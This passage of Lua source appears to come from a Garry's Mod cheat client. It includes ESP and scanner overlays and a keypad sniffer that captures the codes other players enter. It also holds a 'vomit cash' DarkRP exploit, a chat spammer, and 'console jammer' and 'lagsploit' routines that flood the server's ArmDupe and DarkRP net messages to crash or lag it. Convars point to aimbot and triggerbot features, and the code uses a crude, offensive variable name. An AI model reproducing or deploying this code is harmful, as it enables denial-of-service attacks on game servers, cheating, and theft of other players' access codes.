  2431. targhealth = "N/A"
  2432. targid = "N/A"
  2433. targactive = "N/A"
  2434. end
  2435. end
  2436. end
  2437. hook.Add( "Think", "PropScanner", Scanner )
  2439. hook.Add( "HUDPaint", "jav_scandata", function( )
  2440. if GetConVarNumber("jav_scanner_enabled") == 1 then
  2442. surface.SetDrawColor( 0,0,0,150 )
  2443. surface.DrawRect( 410, ScrH() / 2 - 110, 450, 220 )
  2444. surface.SetDrawColor( 255,150,0,155 )
  2445. surface.DrawRect( 500, ScrH() / 2 - 110, 2, 220 )
  2447. draw.SimpleTextOutlined( "Name/Type:", "Trebuchet18", 420, ScrH() / 2 - 100, Color(255,255,255),4,1,1,Color(0,0,0))
  2448. draw.SimpleTextOutlined( "Rank:", "Trebuchet18", 420, ScrH() / 2 - 80, Color(255,255,255),4,1,1,Color(0,0,0))
  2449. draw.SimpleTextOutlined( "Team:", "Trebuchet18", 420, ScrH() / 2 - 60, Color(255,255,255),4,1,1,Color(0,0,0))
  2450. draw.SimpleTextOutlined( "Health:", "Trebuchet18", 420, ScrH() / 2 - 40, Color(255,255,255),4,1,1,Color(0,0,0))
  2451. draw.SimpleTextOutlined( "Distance:", "Trebuchet18", 420, ScrH() / 2 - 20, Color(255,255,255),4,1,1,Color(0,0,0))
  2452. draw.SimpleTextOutlined( "Model:", "Trebuchet18", 420, ScrH() / 2, Color(255,255,255),4,1,1,Color(0,0,0))
  2453. draw.SimpleTextOutlined( "Ent Index:", "Trebuchet18", 420, ScrH() / 2 + 20, Color(255,255,255),4,1,1,Color(0,0,0))
  2454. draw.SimpleTextOutlined( "SteamID:", "Trebuchet18", 420, ScrH() / 2 + 40, Color(255,255,255),4,1,1,Color(0,0,0))
  2455. draw.SimpleTextOutlined( "Active Wep:", "Trebuchet18", 420, ScrH() / 2 + 60, Color(255,255,255),4,1,1,Color(0,0,0))
  2456. draw.SimpleTextOutlined( "Position:", "Trebuchet18", 420, ScrH() / 2 + 80, Color(255,255,255),4,1,1,Color(0,0,0))
  2458. draw.SimpleTextOutlined( targname, "Trebuchet18", 510, ScrH() / 2 - 100, Color(255,255,255),4,1,1,Color(0,0,0))
  2459. draw.SimpleTextOutlined( targdist.."m", "Trebuchet18", 510, ScrH() / 2 - 80, Color(255,255,255),4,1,1,Color(0,0,0))
  2460. draw.SimpleTextOutlined( targmodel, "Trebuchet18", 510, ScrH() / 2 - 60, Color(255,255,255),4,1,1,Color(0,0,0))
  2461. draw.SimpleTextOutlined( targrank, "Trebuchet18", 510, ScrH() / 2 - 40, Color(255,255,255),4,1,1,Color(0,0,0))
  2462. draw.SimpleTextOutlined( targteam, "Trebuchet18", 510, ScrH() / 2 - 20, targteamcolor,4,1,1,Color(0,0,0))
  2463. draw.SimpleTextOutlined( targhealth, "Trebuchet18", 510, ScrH() / 2, Color(100,255,100),4,1,1,Color(0,0,0))
  2464. draw.SimpleTextOutlined( targindex, "Trebuchet18", 510, ScrH() / 2 + 20, Color(255,255,255),4,1,1,Color(0,0,0))
  2465. draw.SimpleTextOutlined( targid, "Trebuchet18", 510, ScrH() / 2 + 40, Color(220,220,255),4,1,1,Color(0,0,0))
  2466. draw.SimpleTextOutlined( targactive, "Trebuchet18", 510, ScrH() / 2 + 60, Color(255,255,0),4,1,1,Color(0,0,0))
  2467. draw.SimpleTextOutlined( "X: "..tostring(targposx), "Trebuchet18", 510, ScrH() / 2 + 80, Color(255,205,255),4,1,1,Color(0,0,0))
  2468. draw.SimpleTextOutlined( "Y: "..tostring(targposy), "Trebuchet18", 570, ScrH() / 2 + 80, Color(255,205,255),4,1,1,Color(0,0,0))
  2469. draw.SimpleTextOutlined( "Z: "..tostring(targposz), "Trebuchet18", 630, ScrH() / 2 + 80, Color(255,205,255),4,1,1,Color(0,0,0))
  2470. end
  2471. end)
  2473. /*------------------------------------------
  2474. Entity Finder ESP
  2475. ------------------------------------------*/
  2478. //Toggle command
  2479. local showing = true
  2481. concommand.Add("jav_entfinder_toggle", function()
  2482. if showing then
  2483. showing = false
  2484. else
  2485. showing = true
  2486. end
  2487. end)
  2489. //Everything menu related
  2490. local EntsToShow = {}
  2491. local OtherEnts = {}
  2493. concommand.Add("jav_entfinder_menu", function(ply, cmd, args)
  2494. function Reload(startX, startY)
  2495. table.Empty(OtherEnts)
  2496. for k,v in pairs(ents.GetAll()) do
  2497. local addToAllEnts = true
  2499. for i,p in pairs(EntsToShow) do
  2500. if p == v:GetClass() then
  2501. addToAllEnts = false
  2502. end
  2503. end
  2505. for i,p in pairs(OtherEnts) do
  2506. if p == v:GetClass() then
  2507. addToAllEnts = false
  2508. end
  2509. end
  2511. if addToAllEnts then
  2512. table.insert(OtherEnts, v:GetClass())
  2513. end
  2514. end
  2516. local main = vgui.Create( "DFrame" )
  2517. main:SetSize( 400, 300 )
  2518. if startX and startY then
  2519. main:SetPos(startX, startY)
  2520. else
  2521. main:Center()
  2522. end
  2523. main:SetTitle( "" )
  2524. main:SetVisible( true )
  2525. main:SetDraggable( true )
  2526. main:ShowCloseButton( true )
  2527. main:MakePopup()
  2528. main.Paint = function()
  2529. draw.RoundedBox( 4, 0, 0, main:GetWide(), main:GetTall(), Color( 0, 0, 0, 200 ) )
  2530. end
  2532. local EFtoggle = vgui.Create( "DButton" )
  2533. EFtoggle:SetParent( main )
  2534. EFtoggle:SetPos( 25, 10 )
  2535. EFtoggle:SetTextColor( Color(255, 255, 255, 255) )
  2536. EFtoggle:SetSize( 110, 25 )
  2537. EFtoggle:SetToolTip( "Toggle Ent Finder" )
  2538. EFtoggle.Paint = function()
  2539. surface.SetDrawColor( 60, 30, 0, 200 )
  2540. EFtoggle:SetText( "Toggle Ent Finder" )
  2541. surface.DrawRect( 0, 0, EFtoggle:GetWide(), EFtoggle:GetTall() )
  2542. end
  2543. EFtoggle.DoClick = function() RunConsoleCommand("jav_entfinder_toggle") end
  2545. local EFdistlabel = vgui.Create( "DLabel", Panel )
  2546. EFdistlabel:SetParent(main)
  2547. EFdistlabel:SetPos( 145, 15 )
  2548. EFdistlabel:SetText( "Draw Distance:" )
  2549. EFdistlabel:SizeToContents()
  2551. local EFdistbox = vgui.Create( "DNumberWang" )// Create the checkbox
  2552. EFdistbox:SetPos( 225, 12 )
  2553. EFdistbox:SetParent(main)
  2554. EFdistbox:SetMin(0)
  2555. EFdistbox:SetMax(999999)
  2556. EFdistbox:SetConVar( "jav_entfinder_distance" )
  2557. EFdistbox:SetToolTip( "how far away you can see target entities from, it would be a good idea to set this low when looking for a common entity to avoid lag" )
  2561. DermaList = vgui.Create( "DPanelList", main )
  2562. DermaList:SetPos( 25,45 )
  2563. DermaList:SetSize( 700, 500 )
  2564. DermaList:SetSpacing( 75 )
  2565. DermaList:EnableHorizontal( false )
  2566. DermaList:EnableVerticalScrollbar( true )
  2568. local SelectedEnts = vgui.Create("DListView")
  2569. SelectedEnts:SetSize(150, 200)
  2570. SelectedEnts:SetPos(0, 0)
  2571. SelectedEnts:SetMultiSelect(false)
  2572. SelectedEnts:AddColumn("Ents to show")
  2573. for k,v in pairs(EntsToShow) do
  2574. SelectedEnts:AddLine(v)
  2575. end
  2576. SelectedEnts.DoDoubleClick = function(parent, index, list)
  2577. table.remove(EntsToShow, index)
  2578. main:Close()
  2579. local x, y = main:GetPos()
  2580. Reload(x, y)
  2581. end
  2582. DermaList:Add(SelectedEnts)
  2584. local AllEnts = vgui.Create("DListView")
  2585. AllEnts:SetSize(150, 200)
  2586. AllEnts:SetPos(200, 0)
  2587. AllEnts:SetMultiSelect(false)
  2588. AllEnts:AddColumn("Ents not to show")
  2589. for k,v in pairs(OtherEnts) do
  2590. AllEnts:AddLine(v)
  2591. end
  2592. AllEnts.DoDoubleClick = function(parent, index, list)
  2593. table.insert(EntsToShow, OtherEnts[index])
  2594. main:Close()
  2595. local x, y = main:GetPos()
  2596. Reload(x, y)
  2597. end
  2598. DermaList:Add(AllEnts)
  2599. end
  2600. Reload()
  2601. end)
  2603. //Actually drawing information
  2604. hook.Add("HUDPaint", "ShowEnts", function()
  2605. if showing then
  2606. for k,v in pairs(ents.GetAll()) do
  2607. local drawing = false
  2610. for i,p in pairs(EntsToShow) do
  2611. if v:GetClass() == p then
  2612. drawing = true
  2613. end
  2614. end
  2616. local Dist = math.floor(v:GetPos():Distance(LocalPlayer():GetPos()))
  2617. local DrawDist = (GetConVarNumber("jav_entfinder_distance") / 0.02)
  2619. if drawing && (Dist < DrawDist) then
  2620. local stuff = v:GetPos():ToScreen()
  2622. local text = v:GetClass()
  2623. draw.SimpleTextOutlined( text, "Trebuchet18", stuff.x - 35, stuff.y - 15, Color(255,255,255),4,1,1,Color(0,0,0))
  2625. surface.SetDrawColor( 255, 150, 0, 255)
  2626. surface.DrawRect( stuff.x - 4, stuff.y -4 , 8, 8)
  2627. end
  2628. end
  2629. end
  2630. end)
  2633. /*------------------------------------------
  2634. Keypad Hax
  2635. ------------------------------------------*/
  2639. local X = -50
  2640. local Y = -100
  2642. local KeyPos = {
  2643. {X+5, Y+100, 25, 25, -2.2, 3.45, 1.3, -0},
  2644. {X+37.5, Y+100, 25, 25, -0.6, 1.85, 1.3, -0},
  2645. {X+70, Y+100, 25, 25, 1.0, 0.25, 1.3, -0},
  2647. {X+5, Y+132.5, 25, 25, -2.2, 3.45, 2.9, -1.6},
  2648. {X+37.5, Y+132.5, 25, 25, -0.6, 1.85, 2.9, -1.6},
  2649. {X+70, Y+132.5, 25, 25, 1.0, 0.25, 2.9, -1.6},
  2651. {X+5, Y+165, 25, 25, -2.2, 3.45, 4.55, -3.3},
  2652. {X+37.5, Y+165, 25, 25, -0.6, 1.85, 4.55, -3.3},
  2653. {X+70, Y+165, 25, 25, 1.0, 0.25, 4.55, -3.3},
  2655. {X+5, Y+67.5, 50, 25, -2.2, 4.7, -0.3, 1.6},
  2656. {X+60, Y+67.5, 35, 25, 0.3, 1.65, -0.3, 1.6}
  2657. }
  2659. local function FindDisplayText(ent)
  2660. if ent.GetDisplayText then
  2661. return ent:GetDisplayText()
  2662. else
  2663. return ent.Entity:GetNetworkedInt("keypad_num")
  2664. end
  2665. end
  2667. local function FindStatus(ent)
  2668. if ent.GetStatus then
  2669. return ent:GetStatus()
  2670. elseif ent.Entity:GetNetworkedBool("keypad_access") and ent.Entity:GetNetworkedBool("keypad_showaccess") then
  2671. return 1
  2672. elseif not ent.Entity:GetNetworkedBool("keypad_access") and ent.Entity:GetNetworkedBool("keypad_showaccess") then
  2673. return 2
  2674. else
  2675. return 0
  2676. end
  2677. end
  2679. hook.Add("Think", "keypadhax", function()
  2680. if GetConVarNumber("jav_keypadhax") == 1 then
  2681. for k,v in pairs(player.GetAll()) do
  2682. local kp = v:GetEyeTrace().Entity
  2683. if IsValid(kp) and (string.find(kp:GetClass(), "keypad") and not(string.find(v:GetClass(), "cracker") or string.find(v:GetClass(), "checker"))) and v:EyePos():Distance(kp:GetPos()) <= 70 then
  2684. kp.tempCode = kp.tempCode or ""
  2685. kp.tempText = kp.tempText or ""
  2686. kp.tempStatus = kp.tempStatus or 0
  2688. if (FindDisplayText(kp) != kp.tempText) or (FindStatus(kp) != kp.tempStatus) then
  2689. kp.tempText = FindDisplayText(kp)
  2690. kp.tempStatus = FindStatus(kp)
  2692. local tr = util.TraceLine({
  2693. start = v:EyePos(),
  2694. endpos = v:GetAimVector() * 32 + v:EyePos(),
  2695. filter = v
  2696. })
  2698. local pos = kp:WorldToLocal(tr.HitPos)
  2700. for i,p in pairs(KeyPos) do
  2701. local x = (pos.y - p[5]) / (p[5] + p[6])
  2702. local y = 1 - (pos.z + p[7]) / (p[7] + p[8])
  2704. if (x >= 0 and y >= 0 and x <= 1 and y <= 1) then
  2705. if i == 11 then
  2706. if kp.tempStatus == 1 then
  2707. kp.code = kp.tempCode
  2708. kp.tempCode = ""
  2709. elseif kp.tempStatus == 2 then
  2710. kp.tempCode = ""
  2711. end
  2712. elseif i == 10 then
  2713. kp.tempCode = ""
  2714. elseif i > 0 then
  2715. kp.tempCode = kp.tempCode..i
  2716. end
  2717. end
  2718. end
  2719. end
  2720. end
  2721. end
  2722. end
  2723. end)
  2725. hook.Add( "HUDPaint", "keypadhaxhud", function()
  2726. if GetConVarNumber("jav_keypadhax") == 1 then
  2727. local e = LocalPlayer():GetEyeTrace().Entity
  2728. if IsValid(e) and string.find(e:GetClass(), "keypad") then
  2729. local text = e.code or "Not Found"
  2730. draw.WordBox( 8, ScrW() / 2, ScrH() / 2, text, "Default", Color(50,50,75,100), Color(255,255,255,255) )
  2731. end
  2733. for k,v in pairs(ents.GetAll()) do
  2734. if IsValid(v) then
  2735. if string.find(v:GetClass(), "keypad") and not(string.find(v:GetClass(), "cracker") or string.find(v:GetClass(), "checker")) then
  2736. if v != e then
  2737. local pos = v:GetPos():ToScreen()
  2738. if IsValid(v) and v.code then
  2739. draw.RoundedBox( 4, pos.x-5, pos.y-5, 20, 20, Color( 0, 255, 0, 150 ) )
  2740. else
  2741. draw.RoundedBox( 4, pos.x-5, pos.y-5, 20, 20, Color( 255, 0, 0, 150 ) )
  2742. end
  2743. end
  2744. end
  2745. end
  2746. end
  2747. end
  2748. end)
  2750. /*------------------------------------------
  2751. Darkrp vomit cash exploit
  2752. ------------------------------------------*/
  2754. local Vomiting = false
  2755. concommand.Add( "jav_vomitcash", function()
  2756. Vomiting = !Vomiting
  2757. if( Vomiting ) then
  2758. timer.Create( "VomitCash", 2, 0, function()
  2759. RunConsoleCommand( "darkrp", "dropmoney", "5" )
  2760. end )
  2761. else
  2762. timer.Destroy( "VomitCash" )
  2763. end
  2764. end )
  2766. /*------------------------------------------
  2767. Console Jammer
  2768. ------------------------------------------*/
  2770. local Jamming = false
  2771. local rape = "{Mins:[-1 -187.9984 -18.8426],Constraints:[],Maxs:[79.2153 126.62.3755 0.3711}}}}"
  2772. concommand.Add( "jav_console_jammer", function()
  2773. Jamming = !Jamming
  2774. if( Jamming ) then
  2775. timer.Create( "JamConsole", 1, 0, function()
  2776. for i = 1, 100 do
  2777. net.Start( "ArmDupe" )
  2778. net.WriteUInt( 999999999999999999, 32 )
  2779. net.WriteData(rape,999999999999999999)
  2780. net.SendToServer()
  2781. end
  2782. end )
  2783. else
  2784. timer.Destroy( "JamConsole" )
  2785. end
  2786. end )
  2788. /*------------------------------------------
  2789. Chat Spammer
  2790. ------------------------------------------*/
  2792. local chatshitting = false
  2793. concommand.Add( "jav_chatspam", function()
  2794. chatshitting = !chatshitting
  2795. if( chatshitting ) then
  2796. timer.Create( "chatshit", 1, 0, function()
  2797. RunConsoleCommand( "say", GetConVarString("jav_chatspam_msg") )
  2798. end )
  2799. else
  2800. timer.Destroy( "chatshit" )
  2801. end
  2802. end )
  2804. /*------------------------------------------
  2805. Sandbox DOS Exploit (Created by legendofrobbo, based on the same theory as anubis's darkrp lagsploit)
  2806. ------------------------------------------*/
  2808. local jav_LagSploit = CreateClientConVar("jav_lagsploit", 0, false, false)
  2809. hook.Add("CreateMove", "lagsploit", function ()
  2810. local lagsploitpower = (GetConVarNumber("jav_lagsploit_power") )
  2811. if(GetConVarNumber("jav_lagsploit") == 1 ) then
  2812. for i=0, lagsploitpower do
  2814. net.Start( "ArmDupe" )
  2815. net.WriteUInt( 0, 32 )
  2816. net.WriteData( "", 0 )
  2817. net.SendToServer()
  2819. end
  2820. end
  2821. end)
  2823. /*------------------------------------------
  2824. Convars
  2825. ------------------------------------------*/
  2827. CreateClientConVar("jav_esp_enabled",0,true,false)
  2828. CreateClientConVar("jav_esp_distance",100,true,false)
  2829. CreateClientConVar("jav_xray_distance",50,true,false)
  2830. CreateClientConVar("jav_esp_position",1,true,false)
  2831. CreateClientConVar("jav_esp_velocity",0,true,false)
  2832. CreateClientConVar("jav_esp_names",1,true,false)
  2833. CreateClientConVar("jav_esp_box",0,true,false)
  2834. CreateClientConVar("jav_esp_showtargetdistance",0,true,false)
  2835. CreateClientConVar("jav_esp_admin",1,true,false)
  2836. CreateClientConVar("jav_esp_budget",0,true,false)
  2837. CreateClientConVar("jav_bhop_enabled",0,true,false)
  2838. CreateClientConVar("jav_mirror_enabled",0,true,false)
  2839. CreateClientConVar("jav_crosshair_enabled",1,true,false)
  2840. CreateClientConVar("jav_flashlight_enabled",0,true,false)
  2841. CreateClientConVar("jav_murderhax",0,true,false)
  2842. CreateClientConVar("jav_ttthax",0,true,false)
  2843. CreateClientConVar("jav_triggerbot_enabled",0,true,false)
  2844. CreateClientConVar("jav_witness_enabled",0,true,false)
  2845. CreateClientConVar("jav_autoaim_enabled",0,true,false)
  2846. CreateClientConVar("jav_aa_targetfriends",1,true,false)
  2847. CreateClientConVar("jav_aa_targetteam",1,true,false)
  2848. CreateClientConVar("jav_aa_angle",25,true,false)
  2849. CreateClientConVar("jav_aa_headshot",1,true,false)
  2850. CreateClientConVar("jav_aa_snaponaim",0,true,false)
  2851. CreateClientConVar("jav_aa_snaponaimgrace",0.5,true,false)
  2852. CreateClientConVar("jav_aa_ignorewalls",0,true,false)
  2853. CreateClientConVar("jav_aa_autoshoot",0,true,false)
  2854. CreateClientConVar("jav_scanner_enabled",0,true,false)
  2855. CreateClientConVar("jav_entfinder_distance",100,true,false)
  2856. CreateClientConVar("jav_keypadhax",0,true,false)
  2857. CreateClientConVar("jav_lagsploit_power",80,true,false)
  2858. CreateClientConVar("jav_autoclick_enabled",0,true,false)
  2859. CreateClientConVar("jav_chatbot",0,true,false)
  2860. CreateClientConVar("jav_chatspam_msg","Your tears are currently being harvested by",true,false)
  2861. CreateClientConVar("jav_colour_r",255,true,false)
  2862. CreateClientConVar("jav_colour_g",150,true,false)
  2863. CreateClientConVar("jav_colour_b",0,true,false)
  2864. CreateClientConVar("jav_radar_enabled",0,true,false)
  2865. CreateClientConVar("jav_radar_size",250,true,false)
  2866. CreateClientConVar("jav_radar_fov",50,true,false)
  2868. /*
  2869. orginal lagsploit code
  2872. local aic_DarkRPLagSploit = CreateClientConVar("aic_darkrp_lagsploit", 0, false, false)
  2873. hook.Add("Think", "aic_sploit01", function ( )
  2874. if((aic_DarkRPLagSploit:GetInt() == 1) and (gmod:GetGamemode().Name == "DarkRP")) then
  2875. for i=0,800do
  2876. net.Start("DarkRP_preferredjobmodel")
  2877. net.WriteUInt(-8, 8)
  2878. net.WriteString("\n\n\n\n\t\t\t\t\t\n\n\n\n\n\n\n")
  2879. net.SendToServer()
  2881. net.Start("DarkRP_spawnPocket")
  2882. net.WriteFloat(-0.1)
  2883. net.SendToServer()
  2884. end
  2885. end
  2886. end)
  2888. cvars.AddChangeCallback("aic_darkrp_lagsploit", function( cVar, oVal, nVal )
  2889. if((tostring(nVal) == "1") and (gmod:GetGamemode().Name != "DarkRP")) then
  2890. if(aic_Notifications:GetString() == "1") then
  2891. Output("Warning! This exploit targets DarkRP.")
  2892. aic_Notifications:SetString("0")
  2893. end
  2894. end
  2895. end)
  2897. */
  2899. local function javRadar()
  2900. if GetConVarNumber("jav_radar_enabled") == 1 then
  2901. local size = GetConVarNumber("jav_radar_size")
  2902. local fov = GetConVarNumber("jav_radar_fov")
  2903. local x = ScrW() - size - 5
  2904. local y = 5
  2906. surface.SetDrawColor(Color(0, 0, 0, 150))
  2907. surface.DrawRect(x, y, size, size)
  2908. x = x - 2
  2909. surface.SetDrawColor(GColScheme)
  2910. surface.DrawRect(x, y, size, 2)
  2911. surface.DrawRect(x, y, 2, size)
  2912. surface.DrawRect(x + size - 1, y, 2, size)
  2913. surface.DrawRect(x, y + (size - 2), size, 2)
  2914. surface.DrawRect((x -2)+ (size/2), (y-2) + (size/2), 4, 4)
  2915. -- if GD.bools["radar_cross"] then
  2916. -- g.surface.DrawRect(x + size - (size * 0.50), y, 1, size)
  2917. -- g.surface.DrawRect(x, y + size - (size * 0.50), size, 1)
  2918. -- end
  2920. for key, ply in pairs(player.GetAll()) do
  2921. if ply ~= LocalPlayer() and ply:Alive() and team.GetName(ply:Team()) ~= "Spectators" then
  2922. local lx = LocalPlayer():GetPos().x - ply:GetPos().x
  2923. local ly = LocalPlayer():GetPos().y - ply:GetPos().y
  2924. local ang = EyeAngles().y
  2925. local cos = math.cos(math.rad(-ang))
  2926. local sin = math.sin(math.rad(-ang))
  2927. local px = (ly * cos) + (lx * sin)
  2928. local py = (lx * cos) - (ly * sin)
  2929. px = px / fov
  2930. py = py / fov
  2931. px = math.Clamp(px, -(size * 0.50), size * 0.50)
  2932. py = math.Clamp(py, -(size * 0.50), size * 0.50)
  2933. local col = GColScheme
  2934. local name = player.GetAll()[key]:Nick()
  2935. draw.SimpleText(name, "default", x + size - (size * 0.50) + px - 13, y + size - (size * 0.50) + py - 7, col, TEXT_ALIGN_LEFT, TEXT_ALIGN_CENTER)
  2936. surface.SetDrawColor(GColScheme)
  2937. surface.DrawRect(x + size - (size * 0.50) + px, y + size - (size * 0.50) + py, 3, 3)
  2938. --surface.DrawRect(x + size - (size * 0.50) + px, y + size - (size * 0.50) + py - 3, 1, 7)
  2940. end
  2942. end
  2944. end
  2945. end
  2946. hook.Add("HUDPaint", "jav_radar", javRadar)
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